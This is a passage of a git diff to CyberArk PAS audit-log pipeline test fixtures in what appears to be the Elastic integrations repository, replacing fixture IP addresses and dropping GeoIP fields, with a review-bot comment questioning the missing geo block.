Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:04:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:04:27\n 
2021-03-15T13:04:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:04:27","IsoTimestamp":"2021-03-15T13:04:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T14:44:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:44:37\n 2021-03-15T14:44:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\n address=67.43.156.15;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:44:37","IsoTimestamp":"2021-03-15T14:44:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json index 0eaba86f2f2..9fa0357de03 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json @@ -7,19 +7,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -39,7 +28,7 @@ }, "@timestamp": "2021-03-11T21:12:22.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" 
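Review bot: The regenerated expectation in the `@@ -7,19 +7,8 @@` hunk drops `destination.geo` altogether for 67.43.156.15 instead of replacing it with the lookup result for the new address, which is worth checking before this is committed. If the point of moving the fixtures onto the supported address range is deterministic GeoIP enrichment in pipeline tests, an absent `geo` object presumably means the expected file was regenerated against a stack without the test GeoIP database, or that the geoip step silently did not run for this event; regenerate with that database loaded and confirm a `"geo": { "continent_name": ..., "country_iso_code": ... }` block appears for 67.43.156.15, or state in the PR why no geo is expected here. The split between `destination.ip` (67.43.156.15) and `file.path` (67.43.156.14) mirrors the new log line, so that part is consistent. The enclosing JSON document starts and ends outside this hunk.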
@@ -51,27 +40,27 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-11T21:12:22Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:12:22\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:12:22Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. 
Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615497142\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:12:22\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:12:22Z\u003c/IsoTimestamp\u003e\n 
\u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615497142\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", 
@@ -82,9 +71,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615497142", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", 
@@ -98,8 +87,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:36.176769500Z", - "original": "\u003c7\u003e1 2021-03-11T21:12:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:12:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:12:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615497142\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:12:22\",\"IsoTimestamp\":\"2021-03-11T21:12:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile 
Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615497142\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403065Z", + "original": "\u003c7\u003e1 2021-03-11T21:12:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:12:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:12:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 
\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615497142\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:12:22\",\"IsoTimestamp\":\"2021-03-11T21:12:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password 
Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615497142\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -127,19 +116,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", 
@@ -159,7 +137,7 @@ }, "@timestamp": "2021-03-14T13:18:15.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" 
@@ -171,28 +149,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-14T13:18:15Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:18:15\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:18:15Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n 